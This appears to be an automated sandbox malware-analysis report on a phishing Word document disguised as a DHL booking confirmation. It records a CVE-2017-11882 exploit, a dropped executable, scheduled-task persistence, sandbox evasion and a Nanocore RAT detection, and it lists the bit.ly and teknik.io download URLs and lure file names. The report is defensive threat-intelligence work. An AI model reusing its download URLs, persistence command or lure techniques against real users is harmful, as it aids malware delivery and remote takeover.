Source: 7.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\69577.exe	Code function: 4_2_001E9B10 push esp; ret	4_2_001E9B49
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F0F78 push FFFFFFA2h; iretd	4_2_004F0F7C
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F0475 push FFFFFFADh; iretd	4_2_004F047C
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F11DD push ds; ret	4_2_004F11DE

Source: initial sample

Static PE information: section name: .text entropy: 7.94577186354

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt	Jump to dropped file
Source: C:\Users\Public\69577.exe	File created: C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Users\Public\69577.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2308	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2828	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: 69577.exe, 00000004.00000002.2116170583.000000000083C000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: 69577.exe, 00000004.00000002.2116204489.00000000008A9000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\69577.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\Public\69577.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\69577.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\Public\69577.exe

Queries volume information: C:\Users\Public\69577.exe VolumeInformation

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: 69577.exe, 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Command and Scripting Interpreter1	Scheduled Task/Job1	Process Injection11	Masquerading121	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing12	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	28%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe	100%	Joe Sandbox ML
C:\Users\Public\69577.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bit.ly	67.199.248.11	true	false	high
teknik.io	5.79.72.163	true	false	high
u.teknik.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bit.ly/3kijui1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://u.teknik.io/HOMqO.txt	3kijui1[1].htm.2.dr	false		high
http://www.%s.comPA	69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	69577.exe, 00000004.00000002.2116349948.0000000002251000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.199.248.11	unknown	United States		396982	GOOGLE-PRIVATE-CLOUDUS	false
5.79.72.163	unknown	Netherlands		60781	LEASEWEB-NL-AMS-01NetherlandsNL	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	357311
Start date:	24.02.2021
Start time:	12:52:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@16/20@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1.3%) Quality average: 71.2% Quality standard deviation: 36.9%
HCA Information:	Successful, ratio: 77% Number of executed functions: 33 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Max analysis timeout: 720s exceeded, the analysis took too long Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 23.0.174.185, 23.0.174.187, 8.253.207.121, 8.241.80.126, 8.248.131.254, 8.252.5.126, 8.250.157.254 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:53:35	API Interceptor	49x Sleep call for process: EQNEDT32.EXE modified
12:53:38	API Interceptor	122x Sleep call for process: 69577.exe modified
12:53:52	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.11	QUOTE.doc	Get hash	malicious	Browse	bit.ly/2P3CMwd
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	bit.ly/2ZElo32
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	bit.ly/3dyLFYN
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	bit.ly/2OMPBuy
	YOUR PRODUCT.doc	Get hash	malicious	Browse	bit.ly/2LVhrUo
	Invoice.doc	Get hash	malicious	Browse	bit.ly/3amsMGn
	Purchase order.doc	Get hash	malicious	Browse	bit.ly/3qm8NNO
	IMG_04779.doc	Get hash	malicious	Browse	bit.ly/3dffBt0
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/3aLXmrV
	PO_Scanned_06387.doc	Get hash	malicious	Browse	bit.ly/3rwUfef
	IMG_Scanned_3062.doc	Get hash	malicious	Browse	bit.ly/2YXPr5o
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/2MvEzt1
	DTBT760087673.doc	Get hash	malicious	Browse	bit.ly/3arM6Rr
	IMG_59733.doc	Get hash	malicious	Browse	bit.ly/3rf1U0L
	IMG_804941.doc	Get hash	malicious	Browse	bit.ly/3cyMT5V
	IMG_0916.doc	Get hash	malicious	Browse	bit.ly/3pFy7y3
	SOA 2.doc	Get hash	malicious	Browse	bit.ly/3cxhzEz
	Quotation Ref FP-299318.doc	Get hash	malicious	Browse	bit.ly/3anMC2V
	PO 9174-AR.doc	Get hash	malicious	Browse	bit.ly/2LcGNNi
	sample new order.doc	Get hash	malicious	Browse	bit.ly/2MIhFy8

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.11
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	67.199.248.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	5.79.72.163
	PO55004.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	RFQ Document.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	5.79.72.163
	SecuriteInfo.com.Trojan.PackedNET.540.1271.exe	Get hash	malicious	Browse	213.227.154.188
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	5.79.70.250
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	5.79.72.163
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	5.79.72.163
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	212.32.237.101
	PO#652.exe	Get hash	malicious	Browse	5.79.87.207
	Parcel _009887 .exe	Get hash	malicious	Browse	212.32.237.92
	PO 20211602.xlsm	Get hash	malicious	Browse	82.192.82.225
	6d0000.exe	Get hash	malicious	Browse	213.227.133.129
	SecuriteInfo.com.Trojan.PackedNET.541.9005.exe	Get hash	malicious	Browse	62.212.86.139
	New Order 83329 PDF.exe	Get hash	malicious	Browse	95.211.208.58
	YTDSetup.exe	Get hash	malicious	Browse	82.192.80.226
	g3hMtp06fF.dll	Get hash	malicious	Browse	77.81.247.140
GOOGLE-PRIVATE-CLOUDUS	Offerte aanvragen 22-02-2021.ppt	Get hash	malicious	Browse	67.199.248.16
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.10
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
